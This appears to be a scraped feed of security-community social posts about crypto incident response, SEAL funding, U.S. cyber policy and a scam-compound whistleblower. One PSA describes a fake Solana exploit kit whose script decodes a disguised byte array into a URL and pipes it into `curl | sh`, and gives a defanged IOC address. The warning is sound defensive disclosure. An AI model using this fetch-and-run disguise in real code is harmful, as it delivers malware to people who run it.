It's fine! EVERYTHING IS FINE!

🚨 PSA: threat actors are approaching crypto projects on Telegram, posing as white-hat researchers, offering an “exploit PoC” for your own infra. The PoC contains malware. Our detailed write-up is linked below.
It’s a complete, runnable Solana exploit kit (fork harness, fixtures, the real program binary) so it looks legit. But poc.mjs reads a byte array from a JSON field called UnifiedSignatureInfo, decodes it to a URL, and runs curl -fsSL -k "<url>" | sh.
The decimal array is plain ASCII posing as a Solana signature. Following the README (npm install, start fork, node poc.mjs) is what detonates it.
IOC: hxxps://162[.]35[.]174[.]231:5000/stage2.
Treat any unsolicited PoC as hostile, review statically in an isolated VM, and never run the setup steps on a box you care about. Report any suspicious reachouts to SEAL.

Very proud of our work with @bax1337 @SteptoeLLP @emmprosecutions and fellow white hats in returning over $1.7M to a victim of the @COLDCARDwallet hack!

A lot of moving parts between @SEAL_911 @zeroshadow_io @D_A_R_TRescue and an anonymous whitehat who is real MVP here. steptoe.com/en/news-publicat…

I was gifted this epic heirloom onion, which I believe is also the first officially signed @torproject onion! This delights me almost as much as the request bewildered @RogerDingledine. 🧅💜

This is a pretty big shift in U.S. cyber policy.
The White House is setting up a program that would let private cybersecurity companies conduct government-authorized operations against foreign cybercriminal groups, including surveillance and disruption of their infrastructure.
Not exactly “hack back,” but definitely a major expansion of the private sector’s role in offensive cyber operations.

I have some of Pars ashes. I will spread them around the grounds of the museum. He was such a good man. I want to thank @debkav & family for this honour.

We're so grateful to everyone who contributed to the
@TheDAOFund's recent Ethereum Security round!
Your support helped fund critical updates for all of our programs:
- SEAL Certifications (recently launched GA!🎉)
- SEAL911 (incident resolution log: github.com/security-alliance…)
- SEAL Frameworks (launched several new domains!🎉)
- SEAL White Hat Safe Harbor (launched several new adoptions! 🎉)
- SEAL Intel (published our first quarterly threat report!🎉)
We're a lean team, so all funding goes directly to sustaining these operations and extending our runway.
<$5K: Covers a few days of operational costs - helps keep servers running and tools maintained.
5K-10K: Covers roughly one to two weeks of operations across all SEAL initiatives.
10K-25K: Covers 2-5 weeks of operations, helping us maintain continuity through 2026.
25K-50K: Covers 1-2 months of operations, giving us real breathing room.
50K+: Covers a month or more, and meaningfully extends our runway, letting us plan ahead instead of month-to-month.
You can still support our initiatives at: securityalliance.org/donate
One of the best parts of running an open funding round is being able to learn in the open.
The @thedaofund Ethereum Security QF Round retrospective is now live!!
Inside you'll find what worked, what didn't, and the improvements we're already thinking about for future rounds.
Thank you to everyone who joined our retrospective calls and shared thoughtful feedback along the way. 💜
$770k stolen 😿
but $3.17M theft from one whale was averted.
Please amplify and flag to any of your friends who used barnbridge because there's still $360k at-risk due to proposal 15.
1/ URGENT @Barn_Bridge warning
I found ~$4M+ in live approval exposure.
Old gov proposals #14/#15 may put user approvals at risk.
#14 can execute anytime. #15 in ~34h.

Red Bull, the scam compound whistleblower from my story below, is struggling to rebuild his life in a new country. He desperately needs tuition funds to keep his student visa, avoid deportation and stay safe.
Anything you can give would go a long way: gofundme.com/f/support-whist…
Last year, a human trafficking victim trapped in a crypto scam compound in the Golden Triangle region of Laos contacted me.
He proceeded to leak a huge trove of the compound's internal materials.
Then he had to get out alive. This is his story. 🧵👇

Honored to attend @NCFTA’s DISRUPTION conference this year supporting @TheHackingGames.
The Cyber-Enabled Harm track brought together investigators, intelligence analysts, #OSINT professionals, #cybersecurity leaders, nonprofits, and law enforcement focused on addressing some of the most serious harms online — especially crimes against children.
Grateful to witness the collaboration, expertise, and humanity in this space. Thank you to @WillMcKeen, @AlexanderSlotnick, @fergushay, @Unit221B, and NCFTA’s Japanese counterparts.
Too many others to name, and too many whose work must remain unseen. From one mother: thank you for protecting children and pursuing accountability against the darkest harms online.
